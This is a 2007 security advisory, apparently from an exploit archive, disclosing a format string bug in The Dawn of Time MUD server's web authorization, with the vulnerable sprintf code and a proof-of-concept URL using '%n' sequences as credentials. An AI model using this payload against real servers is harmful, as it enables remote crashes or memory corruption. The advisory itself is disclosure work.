dot169-format.txt

dot169-format.txt: Posted Oct 6, 2007; Authored by Luigi Auriemma | Site aluigi.org; The Dawn of Time versions 1.69s beta4 and below suffer from a format string vulnerability during web server authorization.; tags | advisory, web; SHA-256 | c8716b25b3663aa3b4c697de1ac36eae400d64c3cd417cd6fc7cf31dd1b56432; Download | Favorite | View

dot169-format.txt


#######################################################################

                             Luigi Auriemma

Application:  The Dawn of Time
              https://www.dawnoftime.org
Versions:     <= 1.69s beta4 (and 1.69r too)
Platforms:    *nix and Windows
Bug:          format string in web server authorization
Exploitation: remote
Date:         05 Oct 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Dawn of Time (aka Dawn) is a MUD server originally based on the
ROM codebase.


#######################################################################

======
2) Bug
======


A format string vulnerability is located in the function which handles
the access to the restricted zones of the internal web server like
"Reset password".
After having decoded the base64 string containing username:password the
string is used without format argument with sprintf().

from websrv.cpp:

bool processWebHeader(web_request_data *w){
                ...
                if (str_len(pLine)>0 && str_len(pLine)<200){
                    char decoded[200];
                    char *d;

                    d =decodeBase64(pLine);
                    if (d){
                        sprintf(decoded,d);
                        ...
void filterWebRequest(connection_data *c){
                    ...
                    if (str_len(pLine)>0 && str_len(pLine)<200){
                        char decoded[200];
                        char *d;

                        d =decodeBase64(pLine);
                        if (d){
                            sprintf(decoded,d);


#######################################################################

===========
3) The Code
===========


Go to:

  https://SERVER:4001/locked

and use the username %n%n%n%n%n
or just:

  https://%n%n%n%n%n:%n%n%n%n%n@SERVER:4001/locked


#######################################################################

======
4) Fix
======


The bug will be officially fixed in the next release.
I have also opened a thread in the Dawn forum some days ago with the
instructions for the fix:

  https://forums.dawnoftime.org/viewtopic.php?t=2102


#######################################################################


--- 
Luigi Auriemma
https://aluigi.org
https://forum.aluigi.org
https://mirror.aluigi.org

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 57 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,965)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,994)
UNIX (9,476)
UnixWare (188)
Windows (6,784)
Other

dot169-format.txt

dot169-format.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

dot169-format.txt

Share This

dot169-format.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems